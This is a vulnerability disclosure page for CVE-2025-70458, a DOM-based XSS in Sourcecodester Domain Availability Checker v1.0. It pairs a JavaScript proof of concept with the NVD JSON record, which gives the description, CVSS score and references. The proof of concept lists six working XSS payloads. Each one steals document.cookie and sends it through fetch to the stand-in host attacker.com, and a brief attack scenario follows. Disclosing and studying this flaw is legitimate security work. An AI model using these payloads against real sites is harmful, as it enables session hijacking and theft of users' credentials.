CVE-2025-70458

// CVE-2025-70458 DOM-based XSS PoC // Target: Sourcecodester Domain Availability Checker v1.0 // Attack Vector: Inject malicious JavaScript via domain search input // Malicious domain input that triggers XSS: const maliciousInput = '<img src=x onerror="fetch(\"https://attacker.com/steal?cookie=\"+document.cookie)\">"'; // Alternative payloads: const payloads = [ '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>', '<svg onload="fetch(\"https://attacker.com/steal?c=\"+btoa(document.cookie))\">', '<iframe src="javascript:fetch(\'https://attacker.com/xss?c=\'+document.cookie)">', 'javascript:fetch("https://attacker.com/steal?c="+document.cookie)', '<body onload="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\">' ]; // Attack scenario: // 1. Attacker crafts a URL with the malicious domain parameter // 2. Victim visits the page with the malicious parameter // 3. createResultElement() renders the input using innerHTML // 4. Malicious JavaScript executes in victim's browser context

{"cve": {"id": "CVE-2025-70458", "sourceIdentifier": "[email protected]", "published": "2026-01-23T22:16:15.360", "lastModified": "2026-01-30T17:59:09.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the DomainCheckerApp class within domain/script.js of Sourcecodester Domain Availability Checker v1.0. The vulnerability occurs because the application improperly handles user-supplied data in the createResultElement method by using the unsafe innerHTML property to render domain search results."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) basada en DOM existe en la clase DomainCheckerApp dentro de domain/script.js de Sourcecodester Domain Availability Checker v1.0. La vulnerabilidad ocurre porque la aplicación maneja incorrectamente los datos proporcionados por el usuario en el método createResultElement al usar la propiedad insegura innerHTML para renderizar los resultados de búsqueda de dominio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:domain_availability_checker:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "74B1DD83-26CA-4E69-A7E1-06F013582A56"}]}]}], "references": [{"url": "https://github.com/ismaildawoodjee/vulnerability-research/security/advisories/GHSA-chm7-vgf7-6f9p", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/18500/domain-availability-checker-using-php-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}]}}